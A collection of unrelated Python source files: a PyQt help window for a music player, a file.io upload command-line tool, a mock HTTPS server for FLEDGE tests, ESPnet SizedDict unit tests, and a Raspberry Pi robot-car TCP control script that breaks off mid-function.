self.height = lib.lyrics_defaultHeight
self.title = lib.progName + lib.titleSeparator + self.tr("Help")
self.initUI()
def initUI(self):
self.setGeometry(self.left, self.top, self.width, self.height)
self.setWindowTitle(self.title)
# Save window geometry and position if not already set
if not lib.config.__contains__("geometry") or not lib.config["geometry"].__contains__("help"):
if not lib.config.__contains__("geometry"):
lib.config["geometry"] = {}
lib.config["geometry"]["help"] = {}
lib.config["geometry"]["help"]["left"] = self.left
lib.config["geometry"]["help"]["top"] = self.top
lib.config["geometry"]["help"]["width"] = self.width
lib.config["geometry"]["help"]["height"] = self.height
# Set fixed window size
# self.setFixedSize(550,380)
self.songText = ""
self.artistText = ""
self.lastSearchedSong = None
self.lastSearchedArtist = None
self.createWidgets()
self.createLayout()
self.show()
def moveEvent(self, event: QtGui.QMoveEvent):
# Set the left and top keys in the geometry key of the config dictionary to the corresponding geometric values and write the config to disk
if not lib.config["geometry"].__contains__("help"):
lib.config["geometry"]["help"] = {}
lib.config["geometry"]["help"]["left"] = self.geometry().left()
lib.config["geometry"]["help"]["top"] = self.geometry().top()
lib.writeToMainConfigJSON(lib.config)
def createWidgets(self):
# Create Widgets for Help Window
self.mainPlayerHelpButton = QtWidgets.QPushButton()
self.mainPlayerHelpButton.setIconSize(QtCore.QSize(100,100))
self.mainPlayerHelpButton.setStyleSheet("background-color: rgba(255, 255, 255, 0)")
self.mainPlayerHelpButton.pressed.connect(self.showMainHelp)
self.miniPlayerHelpButton = QtWidgets.QPushButton()
self.miniPlayerHelpButton.setIconSize(QtCore.QSize(100,100))
self.miniPlayerHelpButton.setStyleSheet("background-color: rgba(255, 255, 255, 0)")
self.miniPlayerHelpButton.pressed.connect(self.showMiniHelp)
self.lyricsHelpButton = QtWidgets.QPushButton()
self.lyricsHelpButton.setIconSize(QtCore.QSize(100,100))
self.lyricsHelpButton.setStyleSheet("background-color: rgba(255, 255, 255, 0)")
self.lyricsHelpButton.pressed.connect(self.showLyricHelp)
self.mainPlayerHelpLabel = QtWidgets.QLabel("Main Player")
self.mainPlayerHelpLabel.setAlignment(QtCore.Qt.AlignCenter)
lib.setAltLabelStyle(self.mainPlayerHelpLabel)
self.miniPlayerHelpLabel = QtWidgets.QLabel("Mini Player")
self.miniPlayerHelpLabel.setAlignment(QtCore.Qt.AlignCenter)
lib.setAltLabelStyle(self.miniPlayerHelpLabel)
self.lyricsHelpLabel = QtWidgets.QLabel("Lyrics")
self.lyricsHelpLabel.setAlignment(QtCore.Qt.AlignCenter)
lib.setAltLabelStyle(self.lyricsHelpLabel)
self.welcomeLabel = QtWidgets.QLabel("""
Welcome to the QMusic Help Window
To get started, simply click an icon below.
""")
self.welcomeLabel.setAlignment(QtCore.Qt.AlignVCenter)
self.welcomeLabel.setWordWrap(True)
self.mainHelp = QtWidgets.QLabel("""
The main player is the main window with all features that will start when you open QMusic.
Here you can add music to the playlist by either:
- Dragging and dropping an audio file or directory
- Selecting File -> Open File in the menu bar
- Open an entire folder by selecting File -> Open Directory
""")
self.mainHelp.setAlignment(QtCore.Qt.AlignLeft)
self.mainHelp.setWordWrap(True)
self.miniHelp = QtWidgets.QLabel("""
To enter the Mini Player window, go to Player -> Switch Player Size
Here you can use a simplified player without a playlist and volume view
To exit simply click Switch Player Size Again.
""")
self.miniHelp.setAlignment(QtCore.Qt.AlignLeft)
self.miniHelp.setWordWrap(True)
self.lyricHelp = QtWidgets.QLabel("""
To enter the Lyrics Window, simply go to Player -> Lyrics
Here you can enter a song and artist name to get lyrics from genius.com
To exit simply close the window.
""")
self.lyricHelp.setAlignment(QtCore.Qt.AlignLeft)
self.lyricHelp.setWordWrap(True)
style = lib.config["style"]
if style == 1:
self.mainPlayerHelpButton.setIcon(QtGui.QIcon(QtGui.QPixmap(lib.get_resourcepath("main_help_inverted.png", self.execDir)).scaledToWidth(self.iconWidth)))
self.miniPlayerHelpButton.setIcon(QtGui.QIcon(QtGui.QPixmap(lib.get_resourcepath("mini_help_inverted.png", self.execDir)).scaledToWidth(self.iconWidth)))
self.lyricsHelpButton.setIcon(QtGui.QIcon(QtGui.QPixmap(lib.get_resourcepath("lyrics_help_inverted.png", self.execDir)).scaledToWidth(self.iconWidth)))
else:
self.mainPlayerHelpButton.setIcon(QtGui.QIcon(QtGui.QPixmap(lib.get_resourcepath("main_help_icon.png", self.execDir)).scaledToWidth(self.iconWidth)))
self.miniPlayerHelpButton.setIcon(QtGui.QIcon(QtGui.QPixmap(lib.get_resourcepath("mini_help_icon.png", self.execDir)).scaledToWidth(self.iconWidth)))
self.lyricsHelpButton.setIcon(QtGui.QIcon(QtGui.QPixmap(lib.get_resourcepath("lyrics_help_icon.png", self.execDir)).scaledToWidth(self.iconWidth)))
def createLayout(self):
# Create Layout
labelGroup = QtWidgets.QGroupBox()
buttonGroup = QtWidgets.QGroupBox()
buttonLayout = QtWidgets.QGridLayout()
buttonLayout.setSpacing(10)
buttonLayout.addWidget(self.mainPlayerHelpButton,0,0)
buttonLayout.addWidget(self.miniPlayerHelpButton,0,1)
buttonLayout.addWidget(self.lyricsHelpButton,0,2)
buttonLayout.addWidget(self.mainPlayerHelpLabel,1,0)
buttonLayout.addWidget(self.miniPlayerHelpLabel,1,1)
buttonLayout.addWidget(self.lyricsHelpLabel,1,2)
labelLayout = QtWidgets.QGridLayout()
labelLayout.setSpacing(0)
labelLayout.addWidget(self.mainHelp)
labelLayout.addWidget(self.miniHelp)
labelLayout.addWidget(self.lyricHelp)
labelLayout.addWidget(self.welcomeLabel)
self.mainHelp.hide()
self.miniHelp.hide()
self.lyricHelp.hide()
buttonGroup.setLayout(buttonLayout)
labelGroup.setLayout(labelLayout)
layout = QtWidgets.QVBoxLayout()
layout.setSpacing(0)
layout.addWidget(labelGroup)
layout.addWidget(buttonGroup)
self.setLayout(layout)
# Hide and show widgets for each button
def showMainHelp(self):
self.mainHelp.show()
self.miniHelp.hide()
self.lyricHelp.hide()
self.welcomeLabel.hide()
def showMiniHelp(self):
self.miniHelp.show()
self.mainHelp.hide()
self.lyricHelp.hide()
self.welcomeLabel.hide()
def showLyricHelp(self):
self.lyricHelp.show()
self.mainHelp.hide()
self.miniHelp.hide()
self.welcomeLabel.hide()
|
file_io_cli.py
|
# Copyright (c) 2018 Niklas Rosenstein
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from __future__ import division, print_function
import argparse
import clipboard
import json
import os
import requests
import subprocess
import sys
import threading
import time
import uuid
__author__ = 'Niklas Rosenstein <rosensteinniklas@gmail.com>'
__version__ = '1.0.4'
class MultipartFileEncoder(object):
def __init__(self, field, fp, filename=None, boundary=None, headers=None):
self.field = field
self.fp = fp
self.filename = filename
self.boundary = (boundary or uuid.uuid4().hex).encode('ascii')
self.content_type = b'multipart/form-data; boundary=' + self.boundary
headers = dict(headers or {})
if 'Content-Disposition' not in headers:
disposition = 'form-data; name="{}"'.format(self.field)
if self.filename:
disposition += '; filename="{}"'.format(self.filename)
headers['Content-Disposition'] = disposition
if 'Content-Type' not in headers:
headers['Content-Type'] = 'application/octet-stream'
self.headers = b'\r\n'.join('{}: {}'.format(k, v).encode('ascii') for k, v in headers.items())
def compute_size(self, include_final_boundary=True):
pos = self.fp.tell()
self.fp.seek(0, os.SEEK_END)
size = self.fp.tell()
self.fp.seek(pos)
size += len(self.boundary) + 4 + 4 + len(self.headers) + 2
if include_final_boundary:
size += 6 + len(self.boundary)
return size
def iter_encode(self, include_final_boundary=True, chunksize=8096):
yield b'--'
yield self.boundary
yield b'\r\n'
yield self.headers
yield b'\r\n'
yield b'\r\n'
# TODO: Check if boundary value occurs in data body.
while True:
data = self.fp.read(chunksize)
if not data: break
yield data
yield b'\r\n'
if include_final_boundary:
yield b'--'
yield self.boundary
yield b'--\r\n'
class GeneratorFileReader(object):
def __init__(self, gen):
self.gen = gen
self.buffer = b''
def readable(self):
return True
def read(self, n=None):
if n is None:
res = self.buffer + b''.join(self.gen)
self.buffer = b''
return res
elif n <= 0:
return b''
else:
res = b''
while n > 0:
part = self.buffer[:n]
res += part
self.buffer = self.buffer[n:]
n -= len(part); assert n >= 0
if not self.buffer:
try:
self.buffer = next(self.gen)
except StopIteration:
break
else:
break
return res
class FileMonitor(object):
def __init__(self, fp, callback=None):
self.fp = fp
self.bytes_read = 0
self.callback = callback
def __getattr__(self, key):
return getattr(self.fp, key)
def read(self, n):
res = self.fp.read(n)
self.bytes_read += len(res)
if self.callback:
self.callback(self)
return res
class ProgressDisplay(object):
SPINCHARS = '\\|/-'
def __init__(self, n_max=None):
self.n_max = n_max
self.alteration = 0
self.last_print = None
def update(self, n_read, force=False):
if not force and self.last_print is not None and time.perf_counter() - self.last_print < 0.25:
return
self.last_print = time.perf_counter()
self.__clear_line(file=sys.stderr)
if self.n_max is None:
c = self.SPINCHARS[self.alteration%len(self.SPINCHARS)]
print('\r{} ({})'.format(c, self.human_size(n_read)),
end='', file=sys.stderr)
else:
w = 60
p = n_read / self.n_max
l = int(w * p)
bar = '[' + '=' * l + ' ' * (w-l) + ']'
print('\r{} {}% ({} / {})'.format(bar, int(p*100),
self.human_size(n_read), self.human_size(self.n_max)),
end='', file=sys.stderr)
sys.stderr.flush()
self.alteration += 1
def finish(self):
print(file=sys.stderr)
@staticmethod
def __clear_line(file=None):
print('\r\33[K', end='', file=file)
@staticmethod
def human_size(n_bytes, units=[' bytes','KB','MB','GB','TB', 'PB', 'EB']):
# https://stackoverflow.com/a/43750422/791713
return str(n_bytes) + units[0] if n_bytes < 1024 else ProgressDisplay.human_size(n_bytes>>10, units[1:])
def stream_file(fp, chunksize=8192):
while True:
data = fp.read(chunksize)
if data: yield data
else: break
def spawn_process(*args, **kwargs):
on_exit = kwargs.pop('on_exit', None)
def worker():
subprocess.call(*args, **kwargs)
if on_exit is not None:
on_exit()
threading.Thread(target=worker).start()
def main(prog=None, argv=None):
parser = argparse.ArgumentParser(prog=prog, description='Upload a file to file.io and print the download link. Supports stdin.')
parser.add_argument('--version', action='version', version=__version__)
parser.add_argument('-e', '--expires', metavar='E',help='set the expiration time for the uploaded file')
parser.add_argument('-n', '--name', help='specify or override the filename')
parser.add_argument('-q', '--quiet', action='store_true', help='hide the progress bar')
parser.add_argument('-c', '--clip', action='store_true', help='copy the URL to your clipboard')
parser.add_argument('-t', '--tar', metavar='PATH', help='create a TAR archive from the specified file or directory')
parser.add_argument('-z', '--gzip', action='store_true', help='filter the TAR archive through gzip (only with -t, --tar)')
parser.add_argument('file', nargs='?', help='the file to upload')
args = parser.parse_args()
if not args.file and not args.tar and sys.stdin.isatty():
parser.print_usage()
return 0
if args.file and args.tar:
parser.error('conflicting options: file and -t, --tar')
if not args.name and args.file:
args.name = os.path.basename(args.file)
elif not args.name and args.tar:
args.name = os.path.basename(args.tar) + ('.tgz' if args.gzip else '.tar')
if args.tar:
r, w = os.pipe()
flags = '-czf-' if args.gzip else '-cf-'
spawn_process(['tar', flags, args.tar], stdout=w, on_exit=lambda: os.close(w))
file_size = None
fp = os.fdopen(r, 'rb')
elif args.file:
file_size = os.stat(args.file).st_size
fp = open(args.file, 'rb')
else:
file_size = None
fp = sys.stdin if sys.version_info[0] == 2 else sys.stdin.buffer
if not args.quiet:
progress = ProgressDisplay(file_size)
fp = FileMonitor(fp, lambda f: progress.update(f.bytes_read))
encoder = MultipartFileEncoder('file', fp, filename=args.name or 'file')
stream = GeneratorFileReader(encoder.iter_encode())
headers = {'Content-Type': encoder.content_type}
params = {}
if args.expires:
params['expires'] = args.expiry
url = 'http://file.io'
if params:
url += '?' + urlencode(params)
try:
response = requests.post(url, params=params,
data=stream_file(stream), headers=headers)
response.raise_for_status()
except BaseException as exc:
if not args.quiet:
progress.finish()
if isinstance(exc, KeyboardInterrupt):
print('aborted.', file=sys.stderr)
return 1
raise
else:
if not args.quiet:
progress.update(fp.bytes_read, force=True)
progress.finish()
link = response.json()['link']
if args.clip:
print(link, '(copied to clipboard)')
clipboard.copy(link)
else:
print(link)
_entry_point = lambda: sys.exit(main())
if __name__ == '__main__':
_entry_point()
|
__init__.py
|
# Copyright 2021 RTBHOUSE. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be found in the LICENSE file.
import http.server
import json
import logging
import pathlib
import ssl
import threading
from dataclasses import dataclass
from functools import partial
from urllib.parse import parse_qs
logger = logging.getLogger(__file__)
common_dir = str(pathlib.Path(__file__).absolute().parent.parent)
class RequestHandler(http.server.SimpleHTTPRequestHandler):
def __init__(self, *args, directory, callback, **kwargs):
self.callback = callback
super().__init__(*args, directory=directory, **kwargs)
def end_headers(self) -> None:
self.send_header('X-Allow-FLEDGE', 'true')
self.send_header('Access-Control-Allow-Origin', '*')
return super().end_headers()
def address_string(self):
return f'{self.client_address[0]} -> :{self.server.server_port}'
def do_GET(self):
params = {}
path = self.path
if '?' in path:
path, tmp = path.split('?', 1)
params = parse_qs(tmp)
self.callback(Request(path, params))
logger.debug(f"request path: {path}, params: {params}")
if path.startswith("/report") or path.startswith('/favicon'):
pass
else:
super().do_GET()
@dataclass(init=True, repr=True, eq=False, frozen=True)
class Request:
path: str
params: map
def get_params(self, key):
return self.params[key]
def get_first_param(self, key):
return self.get_params(key)[0]
def get_first_json_param(self, key):
return json.loads(self.get_first_param(key))
class MockServer:
def __init__(self, port, directory):
self.server_name = 'https://fledge-tests.creativecdn.net'
self.server_port = port
self.server_directory = directory
self.http_server = None
self.requests = []
logger.debug(f"server {self.address} initializing")
server_address = ('0.0.0.0', self.server_port)
self.http_server = http.server.ThreadingHTTPServer(
server_address,
partial(RequestHandler, directory=self.directory, callback=self.requests.append))
self.server_port = self.http_server.server_port
self.http_server.socket = ssl.wrap_socket(
self.http_server.socket,
server_side=True,
certfile=common_dir + '/ssl/fledge-tests.creativecdn.net.crt',
keyfile=common_dir + '/ssl/fledge-tests.creativecdn.net.key',
ssl_version=ssl.PROTOCOL_TLS)
@property
def address(self):
return f'{self.server_name}:{self.server_port}'
@property
def directory(self):
return self.server_directory
def __enter__(self):
logger.debug(f"server {self.address} starting")
thread = threading.Thread(target=self.run, args=())
thread.daemon = True
thread.start()
return self
def run(self):
self.http_server.serve_forever()
def __exit__(self, exc_type, exc_val, exc_tb):
self.http_server.socket.close()
self.http_server.shutdown()
logger.debug(f"server {self.address} stopped")
def get_requests(self):
return self.requests
def get_last_request(self, path):
result = None
for request in self.get_requests():
if request.path == path:
result = request
return result
|
test_sized_dict.py
|
import multiprocessing
import sys
import numpy as np
import pytest
import torch.multiprocessing
from espnet2.utils.sized_dict import get_size
from espnet2.utils.sized_dict import SizedDict
def test_get_size():
d = {}
x = np.random.randn(10)
d["a"] = x
size1 = sys.getsizeof(d)
assert size1 + get_size(x) + get_size("a") == get_size(d)
def test_SizedDict_size():
d = SizedDict()
assert d.size == 0
x = np.random.randn(10)
d["a"] = x
assert d.size == get_size(x) + sys.getsizeof("a")
y = np.random.randn(10)
d["b"] = y
assert d.size == get_size(x) + get_size(y) + sys.getsizeof("a") + sys.getsizeof("b")
# Overwrite
z = np.random.randn(10)
d["b"] = z
assert d.size == get_size(x) + get_size(z) + sys.getsizeof("a") + sys.getsizeof("b")
def _set(d):
d["a"][0] = 10
@pytest.mark.execution_timeout(5)
def test_SizedDict_shared():
d = SizedDict(shared=True)
x = torch.randn(10)
d["a"] = x
mp = multiprocessing.get_context("forkserver")
p = mp.Process(target=_set, args=(d,))
p.start()
p.join()
assert d["a"][0] == 10
def test_SizedDict_getitem():
d = SizedDict(data={"a": 2, "b": 5, "c": 10})
assert d["a"] == 2
def test_SizedDict_iter():
d = SizedDict(data={"a": 2, "b": 5, "c": 10})
assert list(iter(d)) == ["a", "b", "c"]
def test_SizedDict_contains():
d = SizedDict(data={"a": 2, "b": 5, "c": 10})
assert "a" in d
def test_SizedDict_len():
d = SizedDict(data={"a": 2, "b": 5, "c": 10})
assert len(d) == 3
|
TCP_Control.py
|
#-*- coding:utf-8 -*-
import RPi.GPIO as GPIO
import socket
import time
import string
import threading
#按键值定义
run_car = '1' #按键前
back_car = '2' #按键后
left_car = '3' #按键左
right_car = '4' #按键右
stop_car = '0' #按键停
#舵机按键值定义
front_left_servo = '1' #前舵机向左
front_right_servo = '2' #前舵机向右
up_servo = '3' #摄像头舵机向上
down_servo = '4' #摄像头舵机向下
left_servo = '6' #摄像头舵机向左
right_servo = '7' #摄像头舵机向右
updowninit_servo = '5' #摄像头舵机上下复位
stop_servo = '8' #舵机停止
#小车状态值定义
enSTOP = 0
enRUN =1
enBACK = 2
enLEFT = 3
enRIGHT = 4
enTLEFT =5
enTRIGHT = 6
#小车舵机定义
enFRONTSERVOLEFT = 1
enFRONTSERVORIGHT = 2
enSERVOUP = 3
enSERVODOWN = 4
enSERVOUPDOWNINIT = 5
enSERVOLEFT = 6
enSERVORIGHT = 7
enSERVOSTOP = 8
#初始化上下左右角度为90度
ServoLeftRightPos = 90
ServoUpDownPos = 90
g_frontServoPos = 90
g_nowfrontPos = 0
#小车电机引脚定义
IN1 = 20
IN2 = 21
IN3 = 19
IN4 = 26
ENA = 16
ENB = 13
#小车按键定义
key = 8
#超声波引脚定义
EchoPin = 0
TrigPin = 1
#RGB三色灯引脚定义
LED_R = 22
LED_G = 27
LED_B = 24
#舵机引脚定义
FrontServoPin = 23
ServoUpDownPin = 9
ServoLeftRightPin = 11
#红外避障引脚定义
AvoidSensorLeft = 12
AvoidSensorRight = 17
#蜂鸣器引脚定义
buzzer = 8
#灭火电机引脚设置
OutfirePin = 2
#循迹红外引脚定义
#TrackSensorLeftPin1 TrackSensorLeftPin2 TrackSensorRightPin1 TrackSensorRightPin2
# 3 5 4 18
TrackSensorLeftPin1 = 3 #定义左边第一个循迹红外传感器引脚为3口
TrackSensorLeftPin2 = 5 #定义左边第二个循迹红外传感器引脚为5口
TrackSensorRightPin1 = 4 #定义右边第一个循迹红外传感器引脚为4口
TrackSensorRightPin2 = 18 #定义右边第二个循迹红外传感器引脚为18口
#光敏电阻引脚定义
LdrSensorLeft = 7
LdrSensorRight = 6
#变量的定义
#七彩灯RGB三色变量定义
red = 0
green = 0
blue = 0
#TCP通信数据包标志位以及接受和发送数据变量
NewLineReceived = 0
InputString = ''
recvbuf = ''
ReturnTemp = ''
#小车和舵机状态变量
g_CarState = 0
g_ServoState = 0
#小车速度变量
CarSpeedControl = 80
#寻迹,避障,寻光变量
infrared_track_value = ''
infrared_avoid_value = ''
LDR_value = ''
g_lednum = 0
#设置GPIO口为BCM编码方式
GPIO.setmode(GPIO.BCM)
#忽略警告信息
GPIO.setwarnings(False)
#电机引脚初始化为输出模式
#按键引脚初始化为输入模式
#超声波,RGB三色灯,舵机引脚初始化
#红外避障引脚初始化
def init():
global pwm_ENA
global pwm_ENB
global pwm_FrontServo
global pwm_UpDownServo
global pwm_LeftRightServo
global pwm_rled
global pwm_gled
global pwm_bled
GPIO.setup(ENA,GPIO.OUT,initial=GPIO.HIGH)
GPIO.setup(IN1,GPIO.OUT,initial=GPIO.LOW)
GPIO.setup(IN2,GPIO.OUT,initial=GPIO.LOW)
GPIO.setup(ENB,GPIO.OUT,initial=GPIO.HIGH)
GPIO.setup(IN3,GPIO.OUT,initial=GPIO.LOW)
GPIO.setup(IN4,GPIO.OUT,initial=GPIO.LOW)
GPIO.setup(buzzer,GPIO.OUT,initial=GPIO.HIGH)
GPIO.setup(OutfirePin,GPIO.OUT)
GPIO.setup(EchoPin,GPIO.IN)
GPIO.setup(TrigPin,GPIO.OUT)
GPIO.setup(LED_R, GPIO.OUT)
GPIO.setup(LED_G, GPIO.OUT)
GPIO.setup(LED_B, GPIO.OUT)
GPIO.setup(FrontServoPin, GPIO.OUT)
GPIO.setup(ServoUpDownPin, GPIO.OUT)
GPIO.setup(ServoLeftRightPin, GPIO.OUT)
GPIO.setup(AvoidSensorLeft,GPIO.IN)
GPIO.setup(AvoidSensorRight,GPIO.IN)
GPIO.setup(LdrSensorLeft,GPIO.IN)
GPIO.setup(LdrSensorRight,GPIO.IN)
GPIO.setup(TrackSensorLeftPin1,GPIO.IN)
GPIO.setup(TrackSensorLeftPin2,GPIO.IN)
GPIO.setup(TrackSensorRightPin1,GPIO.IN)
GPIO.setup(TrackSensorRightPin2,GPIO.IN)
#设置pwm引脚和频率为2000hz
pwm_ENA = GPIO.PWM(ENA, 2000)
pwm_ENB = GPIO.PWM(ENB, 2000)
pwm_ENA.start(0)
pwm_ENB.start(0)
#设置舵机的频率和起始占空比
pwm_FrontServo = GPIO.PWM(FrontServoPin, 50)
pwm_UpDownServo = GPIO.PWM(ServoUpDownPin, 50)
pwm_LeftRightServo = GPIO.PWM(ServoLeftRightPin, 50)
pwm_FrontServo.start(0)
pwm_UpDownServo.start(0)
pwm_LeftRightServo.start(0)
pwm_rled = GPIO.PWM(LED_R, 1000)
pwm_gled = GPIO.PWM(LED_G, 1000)
pwm_bled = GPIO.PWM(LED_B, 1000)
pwm_rled.start(0)
pwm_gled.start(0)
pwm_bled.start(0)
#小车前进
def run():
GPIO.output(IN1, GPIO.HIGH)
GPIO.output(IN2, GPIO.LOW)
GPIO.output(IN3, GPIO.HIGH)
GPIO.output(IN4, GPIO.LOW)
pwm_ENA.ChangeDutyCycle(CarSpeedControl)
pwm_ENB.ChangeDutyCycle(CarSpeedControl)
#小车后退
def back():
GPIO.output(IN1, GPIO.LOW)
GPIO.output(IN2, GPIO.HIGH)
GPIO.output(IN3, GPIO.LOW)
GPIO.output(IN4, GPIO.HIGH)
pwm_ENA.ChangeDutyCycle(CarSpeedControl)
pwm_ENB.ChangeDutyCycle(CarSpeedControl)
#小车左转
def left():
GPIO.output(IN1, GPIO.LOW)
GPIO.output(IN2, GPIO.LOW)
GPIO.output(IN3, GPIO.HIGH)
GPIO.output(IN4, GPIO.LOW)
pwm_ENA.ChangeDutyCycle(CarSpeedControl)
pwm_ENB.ChangeDutyCycle(CarSpeedControl)
#小车右转
def right():
GPIO.output(IN1, GPIO.HIGH)
GPIO.output(IN2, GPIO.LOW)
GPIO.output(IN3, GPIO.LOW)
GPIO.output(IN4, GPIO.LOW)
pwm_ENA.ChangeDutyCycle(CarSpeedControl)
pwm_ENB.ChangeDutyCycle(CarSpeedControl)
#小车原地左转
def spin_left():
GPIO.output(IN1, GPIO.LOW)
GPIO.output(IN2, GPIO.HIGH)
GPIO.output(IN3, GPIO.HIGH)
GPIO.output(IN4, GPIO.LOW)
pwm_ENA.ChangeDutyCycle(CarSpeedControl)
pwm_ENB.ChangeDutyCycle(CarSpeedControl)
#小车原地右转
def spin_right():
GPIO.output(IN1, GPIO.HIGH)
GPIO.output(IN2, GPIO.LOW)
GPIO.output(IN3, GPIO.LOW)
GPIO.output(IN4, GPIO.HIGH)
pwm_ENA.ChangeDutyCycle(CarSpeedControl)
pwm_ENB.ChangeDutyCycle(CarSpeedControl)
#小车停止
def brake():
GPIO.output(IN1, GPIO.LOW)
GPIO.output(IN2, GPIO.LOW)
GPIO.output(IN3, GPIO.LOW)
GPIO.output(IN4, GPIO.LOW)
#超声波测距函数
def Distance_test():
GPIO.output(TrigPin,GPIO.HIGH)
time.sleep(0.000015)
GPIO.output(TrigPin,GPIO.LOW)
while not GPIO.input(EchoPin):
pass
t1 = time.time()
while GPIO.input(EchoPin):
pass
t2 = time.time()
print "distance is %d " % (((t2 - t1)* 340 / 2) * 100)
time.sleep(0.01)
return ((t2 - t1)* 340 / 2) * 100
#前舵机旋转到指定角度
def frontservo_appointed_detection(pos):
for i in range(18):
pwm_FrontServo.ChangeDutyCycle(2.5 + 10 * pos/180)
time.sleep(0.02) #等待20ms周期结束
#pwm_FrontServo.ChangeDutyCycle(0) #归零信号
#摄像头舵机左右旋转到指定角度
def leftrightservo_appointed_detection(pos):
for i in range(1):
pwm_LeftRightServo.ChangeDutyCycle(2.5 + 10 * pos/180)
time.sleep(0.02) #等待20ms周期结束
#pwm_LeftRightServo.ChangeDutyCycle(0) #归零信号
#摄像头舵机上下旋转到指定角度
def updownservo_appointed_detection(pos):
for i in range(1):
pwm_UpDownServo.ChangeDutyCycle(2.5 + 10 * pos/180)
time.sleep(0.02) #等待20ms周期结束
#pwm_UpDownServo.ChangeDutyCycle(0) #归零信号
#巡线测试
def tracking_test():
global infrared_track_value
#检测到黑线时循迹模块相应的指示灯亮,端口电平为LOW
#未检测到黑线时循迹模块相应的指示灯灭,端口电平为HIGH
TrackSensorLeftValue1 = GPIO.input(TrackSensorLeftPin1)
TrackSensorLeftValue2 = GPIO.input(TrackSensorLeftPin2)
TrackSensorRightValue1 = GPIO.input(TrackSensorRightPin1)
TrackSensorRightValue2 = GPIO.input(TrackSensorRightPin2)
infrared_track_value_list = ['0','0','0','0']
infrared_track_value_list[0] = str(1 ^TrackSensorLeftValue1)
infrared_track_value_list[1] = str(1 ^TrackSensorLeftValue2)
infrared_track_value_list[2] = str(1 ^TrackSensorRightValue1)
infrared_track_value_list[3] = str(1 ^TrackSensorRightValue2)
infrared_track_value = ''.join(infrared_track_value_list)
#避障红外引脚测试
def infrared_avoid_test():
global infrared_avoid_value
#遇到障碍物,红外避障模块的指示灯亮,端口电平为LOW
#未遇到障碍物,红外避障模块的指示灯灭,端口电平为HIGH
LeftSensorValue = GPIO.input(AvoidSensorLeft)
RightSensorValue = GPIO.input(AvoidSensorRight)
infrared_avoid_value_list = ['0','0']
infrared_avoid_value_list[0] = str(1 ^LeftSensorValue)
infrared_avoid_value_list[1] = str(1 ^RightSensorValue)
infrared_avoid_value = ''.join(infrared_avoid_value_list)
#寻光引脚测试
def follow_light_test():
global LDR_value
#遇到光线,寻光模块的指示灯灭,端口电平为HIGH
#未遇光线,寻光模块的指示灯亮,端口电平为LOW
LdrSersorLeftValue = GPIO.input(LdrSensorLeft)
LdrSersorRightValue = GPIO.input(LdrSensorRight)
LDR_value_list = ['0','0']
LDR_value_list[0] = str(LdrSersorLeftValue)
LDR_value_list[1] = str(LdrSersorRightValue)
LDR_value = ''.join(LDR_value_list)
#小车鸣笛
def whistle():
GPIO.output(buzzer, GPIO.LOW)
time.sleep(0.1)
GPIO.output(buzzer, GPIO.HIGH)
time.sleep(0.001)
#七彩灯亮指定颜色
def color_led_pwm(iRed,iGreen, iBlue):
v_red = (100*iRed)/255
v_green = (100*iGreen)/255
v_blue = (100*iBlue)/255
pwm_rled.ChangeDutyCycle(v_red)
pwm_gled.ChangeDutyCycle(v_green)
pwm_bled.ChangeDutyCycle(v_blue)
time.sleep(0.02)
#摄像头舵机向上运动
def servo_up():
global ServoUpDownPos
pos = ServoUpDownPos
updownservo_appointed_detection(pos)
#time.sleep(0.05)
pos +=0.7
ServoUpDownPos = pos
if ServoUpDownPos >= 180:
ServoUpDownPos = 180
#摄像头舵机向下运动
def servo_down():
global ServoUpDownPos
pos = ServoUpDownPos
updownservo_appointed_detection(pos)
#time.sleep(0.05)
pos -= 0.7
ServoUpDownPos = pos
if ServoUpDownPos <= 45:
ServoUpDownPos = 45
#摄像头舵机向左运动
def servo_left():
global ServoLeftRightPos
pos = ServoLeftRightPos
leftrightservo_appointed_detection(pos)
#time.sleep(0.10)
pos += 0.7
ServoLeftRightPos = pos
if ServoLeftRightPos >= 180:
ServoLeftRightPos = 180
#摄像头舵机向右运动
def servo_right():
global ServoLeftRightPos
pos = ServoLeftRightPos
leftrightservo_appointed_detection(pos)
#time.sleep(0.10)
pos -= 0.7
ServoLeftRightPos = pos
if ServoLeftRightPos <= 0:
ServoLeftRightPos = 0
#前舵机向左
def front_servo_left():
frontservo_appointed_detection(180)
#前舵机向右
def front_servo_right():
frontservo_appointed_detection(0)
#所有舵机归位
def servo_init():
servoflag = 0
servoinitpos = 90
if servoflag != servoinitpos:
frontservo_appointed_detection(servoinitpos)
updownservo_appointed_detection(servoinitpos)
leftrightservo_appointed_detection(servoinitpos)
time.sleep(0.5)
pwm_FrontServo.ChangeDutyCycle(0) #归零信号
pwm_LeftRightServo.ChangeDutyCycle(0) #归零信号
pwm_UpDownServo.ChangeDutyCycle(0) #归零信号
#摄像头舵机上下归位
def servo_updown_init():
updownservo_appointed_detection(90)
#舵机停止
def servo_stop():
pwm_LeftRightServo.ChangeDutyCycle(0) #归零信号
pwm_UpDownServo.ChangeDutyCycle(0) #归零信号
pwm_FrontServo.ChangeDutyCycle(0) #归零信号
#tcp数据解析并指定相应的动作
def tcp_data_parse():
global NewLineReceived
global CarSpeedControl
global g_CarState
global g_ServoState
global g_frontServoPos
global red
global green
global blue
global g_lednum
#解析上位机发来的舵机云台的控制指令并执行舵机旋转
#如:$4WD,PTZ180# 舵机转动到180度
if (InputString.find("$4WD,PTZ", 0, len(InputString)) != -1):
i = InputString.find("PTZ", 0, len(InputString))
ii = InputString.find("#", 0, len(InputString))
if ii > i:
string = InputString[i+3:ii]
m_kp = int(string)
g_frontServoPos = 180 - m_kp;
NewLineReceived = 0
InputString.zfill(len(InputString))
